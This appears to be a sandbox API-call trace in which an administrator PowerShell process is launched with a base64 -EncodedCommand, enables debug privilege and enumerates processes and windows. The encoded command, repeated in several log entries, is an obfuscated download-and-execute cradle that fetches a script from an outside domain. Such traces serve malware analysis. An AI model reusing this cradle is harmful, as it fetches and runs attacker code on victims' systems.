	[0508.023] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c7ada40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x2b
	[0508.023] SetErrorMode (uMode=0x1) returned 0x1
	[0508.024] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.EXE", lpFindFileData=0x1c7adbe0 | out: lpFindFileData=0x1c7adbe0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x82dd7f7c, ftCreationTime.dwHighDateTime=0x1ca0414, ftLastAccessTime.dwLowDateTime=0x82dd7f7c, ftLastAccessTime.dwHighDateTime=0x1ca0414, ftLastWriteTime.dwLowDateTime=0xe84fc9b0, ftLastWriteTime.dwHighDateTime=0x1ca0423, nFileSizeHigh=0x0, nFileSizeLow=0x73a00, dwReserved0=0x0, dwReserved1=0x0, cFileName="powershell.exe", cAlternateFileName="")) returned 0x466350
	[0508.025] FindNextFileW (in: hFindFile=0x466350, lpFindFileData=0x1c7adbf0 | out: lpFindFileData=0x1c7adbf0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x82dd7f7c, ftCreationTime.dwHighDateTime=0x1ca0414, ftLastAccessTime.dwLowDateTime=0x82dd7f7c, ftLastAccessTime.dwHighDateTime=0x1ca0414, ftLastWriteTime.dwLowDateTime=0xe84fc9b0, ftLastWriteTime.dwHighDateTime=0x1ca0423, nFileSizeHigh=0x0, nFileSizeLow=0x73a00, dwReserved0=0x0, dwReserved1=0x0, cFileName="powershell.exe", cAlternateFileName="")) returned 0
	[0508.025] FindClose (in: hFindFile=0x466350 | out: hFindFile=0x466350) returned 1
	[0508.025] SetErrorMode (uMode=0x1) returned 0x1
	[0508.026] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", nBufferLength=0x105, lpBuffer=0x1c7add00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", lpFilePart=0x0) returned 0x39
	[0508.026] SetErrorMode (uMode=0x1) returned 0x1
	[0508.026] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe"), fInfoLevelId=0x0, lpFileInformation=0x1c7adf10 | out: lpFileInformation=0x1c7adf10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x82dd7f7c, ftCreationTime.dwHighDateTime=0x1ca0414, ftLastAccessTime.dwLowDateTime=0x82dd7f7c, ftLastAccessTime.dwHighDateTime=0x1ca0414, ftLastWriteTime.dwLowDateTime=0xe84fc9b0, ftLastWriteTime.dwHighDateTime=0x1ca0423, nFileSizeHigh=0x0, nFileSizeLow=0x73a00)) returned 1
	[0508.026] SetErrorMode (uMode=0x1) returned 0x1
	[0508.027] CoTaskMemAlloc (cb=0x104) returned 0x484960
	[0508.027] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x484960, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0508.027] CoTaskMemFree (pv=0x484960) 
	[0508.029] CoTaskMemAlloc (cb=0x104) returned 0x484960
	[0508.029] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x484960, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0508.029] CoTaskMemFree (pv=0x484960) 
	[0508.032] CoTaskMemAlloc (cb=0x104) returned 0x484960
	[0508.032] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x484960, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0508.032] CoTaskMemFree (pv=0x484960) 
	[0508.565] CoTaskMemAlloc (cb=0x104) returned 0x484960
	[0508.565] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x484960, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0508.565] CoTaskMemFree (pv=0x484960) 
	[0508.578] CoTaskMemAlloc (cb=0x3b) returned 0x4a7d40
	[0508.579] SHGetFileInfoA (in: pszPath="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", dwFileAttributes=0x0, psfi=0x1c7ae0f8, cbFileInfo=0x168, uFlags=0x2000 | out: psfi=0x1c7ae0f8) returned 0x4550
	[0508.579] CoTaskMemFree (pv=0x4a7d40) 
	[0508.582] GetConsoleWindow () returned 0x10364
	[0508.590] CoTaskMemAlloc (cb=0x104) returned 0x484960
	[0508.590] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x484960, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0508.590] CoTaskMemFree (pv=0x484960) 
	[0508.591] CoTaskMemAlloc (cb=0x104) returned 0x484960
	[0508.591] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x484960, nSize=0x80 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35
	[0508.591] CoTaskMemFree (pv=0x484960) 
	[0509.378] CoTaskMemAlloc (cb=0x104) returned 0x484960
	[0509.378] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x484960, nSize=0x80 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35
	[0509.378] CoTaskMemFree (pv=0x484960) 
	[0509.380] CommandLineToArgvW (in: lpCmdLine=" -EncodedCommand JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA==", pNumArgs=0x1c7ae140 | out: pNumArgs=0x1c7ae140) returned 0x1b85d4a0*=""
	[0509.381] lstrlenW (lpString="-EncodedCommand") returned 15
	[0509.382] CoTaskMemAlloc (cb=0x22) returned 0x1b859ac0
	[0509.382] RtlMoveMemory (in: Destination=0x1b859ac0, Source=0x1b85d4c2, Length=0x20 | out: Destination=0x1b859ac0) 
	[0509.382] CoTaskMemFree (pv=0x1b859ac0) 
	[0509.382] lstrlenW (lpString="JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA==") returned 376
	[0509.382] CoTaskMemAlloc (cb=0x2f4) returned 0x1b8423d0
	[0509.382] RtlMoveMemory (in: Destination=0x1b8423d0, Source=0x1b85d4e2, Length=0x2f2 | out: Destination=0x1b8423d0) 
	[0509.382] CoTaskMemFree (pv=0x1b8423d0) 
	[0509.383] LocalFree (hMem=0x1b85d4a0) returned 0x0
	[0509.384] CoTaskMemAlloc (cb=0x804) returned 0x1b85e530
	[0509.384] GetConsoleTitleW (in: lpConsoleTitle=0x1b85e530, nSize=0x400 | out: lpConsoleTitle="Administrator: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe") returned 0x48
	[0509.384] CoTaskMemFree (pv=0x1b85e530) 
	[0509.393] CoTaskMemAlloc (cb=0x38e) returned 0x1b85d4a0
	[0509.393] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"  -EncodedCommand JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA==", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x0, lpEnvironment=0x0, lpCurrentDirectory="C:\\Windows\\system32", lpStartupInfo=0x1c7ae0a0*(cb=0x68, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x30bb628 | out: lpCommandLine="\"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"  -EncodedCommand JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA==", lpProcessInformation=0x30bb628*(hProcess=0x344, hThread=0x350, dwProcessId=0x1938, dwThreadId=0x193c)) returned 1
	[0509.923] CoTaskMemFree (pv=0x1b85d4a0) 
	[0509.924] CloseHandle (hObject=0x350) returned 1
	[0509.924] CoTaskMemAlloc (cb=0x3b) returned 0x4a7d40
	[0509.924] SHGetFileInfoA (in: pszPath="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", dwFileAttributes=0x0, psfi=0x1c7ae148, cbFileInfo=0x168, uFlags=0x2000 | out: psfi=0x1c7ae148) returned 0x4550
	[0509.925] CoTaskMemFree (pv=0x4a7d40) 
	[0509.928] GetCurrentProcess () returned 0xffffffffffffffff
	[0509.928] GetCurrentProcess () returned 0xffffffffffffffff
	[0509.929] DuplicateHandle (in: hSourceProcessHandle=0xffffffffffffffff, hSourceHandle=0x344, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0x1c7ae228, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x1c7ae228*=0x350) returned 1

Process:
	id = "44"
	image_name = "powershell.exe"
	filename = "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe"
	page_root = "0x1386000"
	os_pid = "0xd70"
	os_integrity_level = "0x3000"
	os_privileges = "0x60800000"
	monitor_reason = "child_process"
	parent_id = "1"
	os_parent_pid = "0xb40"
	cmd_line = "\"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" powershell -EncodedCommand JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA=="
	cur_dir = "C:\\Windows\\system32\\"
	os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz"
	bitness = "64"
	os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e9ce" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7]


Thread:
	id = 261
	os_tid = 0xd74

	[0460.684] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0
	[0462.126] SysStringByteLen (bstr="Microsoft.PowerShell.ConsoleHost, Version=1.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35, ProcessorArchitecture=msil") returned 0xfe
	[0462.127] SysStringByteLen (bstr="Microsoft.PowerShell.ConsoleHost, Version=1.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35, ProcessorArchitecture=msil") returned 0xfe
	[0462.127] SysStringByteLen (bstr="Microsoft.PowerShell.UnmanagedPSEntry") returned 0x4a
	[0462.127] SysStringByteLen (bstr="Microsoft.PowerShell.UnmanagedPSEntry") returned 0x4a
	[0468.182] GetVersionExW (in: lpVersionInformation=0x1cdd40*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1cdd40*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
	[0468.184] GetVersionExW (in: lpVersionInformation=0x1cdd40*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1cdd40*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
	[0468.192] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cd960, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0468.197] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cda00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0468.197] GetVersionExW (in: lpVersionInformation=0x1cdab0*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1cdab0*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
	[0468.198] SetErrorMode (uMode=0x1) returned 0x1
	[0468.199] GetFileAttributesExW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll" (normalized: "c:\\windows\\assembly\\gac_msil\\system.management.automation\\1.0.0.0__31bf3856ad364e35\\system.management.automation.dll"), fInfoLevelId=0x0, lpFileInformation=0x1cdc10 | out: lpFileInformation=0x1cdc10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa85ac0a8, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0xa85ac0a8, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0xa85d2208, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x2df000)) returned 1
	[0468.200] SetErrorMode (uMode=0x1) returned 0x1
	[0468.203] GetFileVersionInfoSizeW (in: lptstrFilename="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpdwHandle=0x1cde80 | out: lpdwHandle=0x1cde80) returned 0x94c
	[0468.204] GetFileVersionInfoW (in: lptstrFilename="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", dwHandle=0x0, dwLen=0x94c, lpData=0x2ac72d8 | out: lpData=0x2ac72d8) returned 1
	[0468.207] VerQueryValueW (in: pBlock=0x2ac72d8, lpSubBlock="\\VarFileInfo\\Translation", lplpBuffer=0x1cddf8, puLen=0x1cddf0 | out: lplpBuffer=0x1cddf8*=0x2ac7374, puLen=0x1cddf0) returned 1
	[0468.209] lstrlenW (lpString="䅁") returned 1
	[0468.218] VerQueryValueW (in: pBlock=0x2ac72d8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\CompanyName", lplpBuffer=0x1cdd68, puLen=0x1cdd60 | out: lplpBuffer=0x1cdd68*=0x2ac7450, puLen=0x1cdd60) returned 1
	[0468.219] lstrlenW (lpString="Microsoft Corporation") returned 21
	[0468.221] CoTaskMemAlloc (cb=0x2e) returned 0x3e0c80
	[0468.221] lstrcpyW (in: lpString1=0x3e0c80, lpString2="Microsoft Corporation" | out: lpString1="Microsoft Corporation") returned="Microsoft Corporation"
	[0468.769] CoTaskMemFree (pv=0x3e0c80) 
	[0468.769] VerQueryValueW (in: pBlock=0x2ac72d8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\FileDescription", lplpBuffer=0x1cdd68, puLen=0x1cdd60 | out: lplpBuffer=0x1cdd68*=0x2ac74a4, puLen=0x1cdd60) returned 1
	[0468.769] lstrlenW (lpString="System.Management.Automation") returned 28
	[0468.769] CoTaskMemAlloc (cb=0x3c) returned 0x319860
	[0468.769] lstrcpyW (in: lpString1=0x319860, lpString2="System.Management.Automation" | out: lpString1="System.Management.Automation") returned="System.Management.Automation"
	[0468.769] CoTaskMemFree (pv=0x319860) 
	[0468.769] VerQueryValueW (in: pBlock=0x2ac72d8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\FileVersion", lplpBuffer=0x1cdd68, puLen=0x1cdd60 | out: lplpBuffer=0x1cdd68*=0x2ac7500, puLen=0x1cdd60) returned 1
	[0468.769] lstrlenW (lpString="6.1.7601.17514") returned 14
	[0468.769] CoTaskMemAlloc (cb=0x20) returned 0x3def80
	[0468.769] lstrcpyW (in: lpString1=0x3def80, lpString2="6.1.7601.17514" | out: lpString1="6.1.7601.17514") returned="6.1.7601.17514"
	[0468.769] CoTaskMemFree (pv=0x3def80) 
	[0468.770] VerQueryValueW (in: pBlock=0x2ac72d8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\InternalName", lplpBuffer=0x1cdd68, puLen=0x1cdd60 | out: lplpBuffer=0x1cdd68*=0x2ac7540, puLen=0x1cdd60) returned 1
	[0468.770] lstrlenW (lpString="System.Management.Automation.dll") returned 32
	[0468.770] CoTaskMemAlloc (cb=0x44) returned 0x319860
	[0468.770] lstrcpyW (in: lpString1=0x319860, lpString2="System.Management.Automation.dll" | out: lpString1="System.Management.Automation.dll") returned="System.Management.Automation.dll"
	[0468.770] CoTaskMemFree (pv=0x319860) 
	[0468.770] VerQueryValueW (in: pBlock=0x2ac72d8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\LegalCopyright", lplpBuffer=0x1cdd68, puLen=0x1cdd60 | out: lplpBuffer=0x1cdd68*=0x2ac75a8, puLen=0x1cdd60) returned 1
	[0468.770] lstrlenW (lpString="Copyright (c) Microsoft Corporation. All rights reserved.") returned 57
	[0468.770] CoTaskMemAlloc (cb=0x76) returned 0x381420
	[0468.770] lstrcpyW (in: lpString1=0x381420, lpString2="Copyright (c) Microsoft Corporation. All rights reserved." | out: lpString1="Copyright (c) Microsoft Corporation. All rights reserved.") returned="Copyright (c) Microsoft Corporation. All rights reserved."
	[0468.770] CoTaskMemFree (pv=0x381420) 
	[0468.770] VerQueryValueW (in: pBlock=0x2ac72d8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\OriginalFilename", lplpBuffer=0x1cdd68, puLen=0x1cdd60 | out: lplpBuffer=0x1cdd68*=0x2ac7644, puLen=0x1cdd60) returned 1
	[0468.770] lstrlenW (lpString="System.Management.Automation.dll") returned 32
	[0468.770] CoTaskMemAlloc (cb=0x44) returned 0x319860
	[0468.770] lstrcpyW (in: lpString1=0x319860, lpString2="System.Management.Automation.dll" | out: lpString1="System.Management.Automation.dll") returned="System.Management.Automation.dll"
	[0468.770] CoTaskMemFree (pv=0x319860) 
	[0468.770] VerQueryValueW (in: pBlock=0x2ac72d8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\ProductName", lplpBuffer=0x1cdd68, puLen=0x1cdd60 | out: lplpBuffer=0x1cdd68*=0x2ac76a8, puLen=0x1cdd60) returned 1
	[0468.770] lstrlenW (lpString="Microsoft (R) Windows (R) Operating System") returned 42
	[0468.770] CoTaskMemAlloc (cb=0x58) returned 0x3a2e70
	[0468.770] lstrcpyW (in: lpString1=0x3a2e70, lpString2="Microsoft (R) Windows (R) Operating System" | out: lpString1="Microsoft (R) Windows (R) Operating System") returned="Microsoft (R) Windows (R) Operating System"
	[0468.770] CoTaskMemFree (pv=0x3a2e70) 
	[0468.770] VerQueryValueW (in: pBlock=0x2ac72d8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\ProductVersion", lplpBuffer=0x1cdd68, puLen=0x1cdd60 | out: lplpBuffer=0x1cdd68*=0x2ac7724, puLen=0x1cdd60) returned 1
	[0468.770] lstrlenW (lpString="6.1.7601.17514") returned 14
	[0468.770] CoTaskMemAlloc (cb=0x20) returned 0x3def80
	[0468.770] lstrcpyW (in: lpString1=0x3def80, lpString2="6.1.7601.17514" | out: lpString1="6.1.7601.17514") returned="6.1.7601.17514"
	[0468.770] CoTaskMemFree (pv=0x3def80) 
	[0468.770] VerQueryValueW (in: pBlock=0x2ac72d8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\Comments", lplpBuffer=0x1cdd68, puLen=0x1cdd60 | out: lplpBuffer=0x1cdd68*=0x2ac73cc, puLen=0x1cdd60) returned 1
	[0468.770] lstrlenW (lpString="Microsoft Windows PowerShell Engine Core Assembly") returned 49
	[0468.770] CoTaskMemAlloc (cb=0x66) returned 0x35c1a0
	[0468.770] lstrcpyW (in: lpString1=0x35c1a0, lpString2="Microsoft Windows PowerShell Engine Core Assembly" | out: lpString1="Microsoft Windows PowerShell Engine Core Assembly") returned="Microsoft Windows PowerShell Engine Core Assembly"
	[0468.770] CoTaskMemFree (pv=0x35c1a0) 
	[0468.771] VerQueryValueW (in: pBlock=0x2ac72d8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\LegalTrademarks", lplpBuffer=0x1cdd68, puLen=0x1cdd60 | out: lplpBuffer=0x1cdd68*=0x0, puLen=0x1cdd60) returned 0
	[0468.771] VerQueryValueW (in: pBlock=0x2ac72d8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\PrivateBuild", lplpBuffer=0x1cdd68, puLen=0x1cdd60 | out: lplpBuffer=0x1cdd68*=0x0, puLen=0x1cdd60) returned 0
	[0468.771] VerQueryValueW (in: pBlock=0x2ac72d8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\SpecialBuild", lplpBuffer=0x1cdd68, puLen=0x1cdd60 | out: lplpBuffer=0x1cdd68*=0x0, puLen=0x1cdd60) returned 0
	[0468.771] VerQueryValueW (in: pBlock=0x2ac72d8, lpSubBlock="\\VarFileInfo\\Translation", lplpBuffer=0x1cdd38, puLen=0x1cdd30 | out: lplpBuffer=0x1cdd38*=0x2ac7374, puLen=0x1cdd30) returned 1
	[0468.772] CoTaskMemAlloc (cb=0x204) returned 0x3eb2e0
	[0468.772] VerLanguageNameW (in: wLang=0x0, szLang=0x3eb2e0, cchLang=0x100 | out: szLang="Language Neutral") returned 0x10
	[0468.773] CoTaskMemFree (pv=0x3eb2e0) 
	[0468.773] VerQueryValueW (in: pBlock=0x2ac72d8, lpSubBlock="\\", lplpBuffer=0x1cdd88, puLen=0x1cdd80 | out: lplpBuffer=0x1cdd88*=0x2ac7300, puLen=0x1cdd80) returned 1
	[0468.779] GetCurrentProcessId () returned 0xd70
	[0468.794] LookupPrivilegeValueW (in: lpSystemName=0x0, lpName="SeDebugPrivilege", lpLuid=0x1cccb0 | out: lpLuid=0x1cccb0*(LowPart=0x14, HighPart=0)) returned 1
	[0468.797] GetCurrentProcess () returned 0xffffffffffffffff
	[0468.798] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x20, TokenHandle=0x1cccd0 | out: TokenHandle=0x1cccd0*=0x2e0) returned 1
	[0468.799] AdjustTokenPrivileges (in: TokenHandle=0x2e0, DisableAllPrivileges=0, NewState=0x2acab50*(PrivilegesCount=0x1, Privileges=((Luid.LowPart=0x14, Luid.HighPart=0, Attributes=0x2))), BufferLength=0x0, PreviousState=0x0, ReturnLength=0x0 | out: PreviousState=0x0, ReturnLength=0x0) returned 1
	[0468.800] CloseHandle (hObject=0x2e0) returned 1
	[0468.804] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0xd70) returned 0x2e0
	[0469.222] EnumProcessModules (in: hProcess=0x2e0, lphModule=0x2acabb8, cb=0x200, lpcbNeeded=0x1cdce8 | out: lphModule=0x2acabb8, lpcbNeeded=0x1cdce8) returned 1
	[0469.224] GetModuleInformation (in: hProcess=0x2e0, hModule=0x13f370000, lpmodinfo=0x2acae28, cb=0x18 | out: lpmodinfo=0x2acae28*(lpBaseOfDll=0x13f370000, SizeOfImage=0x77000, EntryPoint=0x13f37c63c)) returned 1
	[0469.225] CoTaskMemAlloc (cb=0x804) returned 0x3eba10
	[0469.225] GetModuleBaseNameW (in: hProcess=0x2e0, hModule=0x13f370000, lpBaseName=0x3eba10, nSize=0x800 | out: lpBaseName="powershell.exe") returned 0xe
	[0469.225] CoTaskMemFree (pv=0x3eba10) 
	[0469.226] CoTaskMemAlloc (cb=0x804) returned 0x3eba10
	[0469.226] GetModuleFileNameExW (in: hProcess=0x2e0, hModule=0x13f370000, lpFilename=0x3eba10, nSize=0x800 | out: lpFilename="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe")) returned 0x39
	[0469.226] CoTaskMemFree (pv=0x3eba10) 
	[0469.227] CloseHandle (hObject=0x2e0) returned 1
	[0469.235] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0xd70) returned 0x2e0
	[0469.236] GetExitCodeProcess (in: hProcess=0x2e0, lpExitCode=0x1cde18 | out: lpExitCode=0x1cde18*=0x103) returned 1
	[0469.244] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x12acb088, Length=0x20000, ResultLength=0x1cdde0 | out: SystemInformation=0x12acb088, ResultLength=0x1cdde0*=0x2ca90) returned 0xc0000004
	[0469.245] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x12aeb0b8, Length=0x2f290, ResultLength=0x1cdde0 | out: SystemInformation=0x12aeb0b8, ResultLength=0x1cdde0*=0x2ca90) returned 0x0
	[0469.261] EnumWindows (lpEnumFunc=0x26d66ac, lParam=0x0) returned 1
	[0471.452] GetWindowThreadProcessId (in: hWnd=0x10090, lpdwProcessId=0x1cdb40 | out: lpdwProcessId=0x1cdb40) returned 0x4d0
	[0471.452] GetWindowThreadProcessId (in: hWnd=0x3013e, lpdwProcessId=0x1cdb40 | out: lpdwProcessId=0x1cdb40) returned 0x558
	[0471.452] GetWindowThreadProcessId (in: hWnd=0x201ba, lpdwProcessId=0x1cdb40 | out: lpdwProcessId=0x1cdb40) returned 0x4d0
	[0471.452] GetWindowThreadProcessId (in: hWnd=0x300fe, lpdwProcessId=0x1cdb40 | out: lpdwProcessId=0x1cdb40) returned 0x4d0
	[0471.452] GetWindowThreadProcessId (in: hWnd=0x400ae, lpdwProcessId=0x1cdb40 | out: lpdwProcessId=0x1cdb40) returned 0x4d0
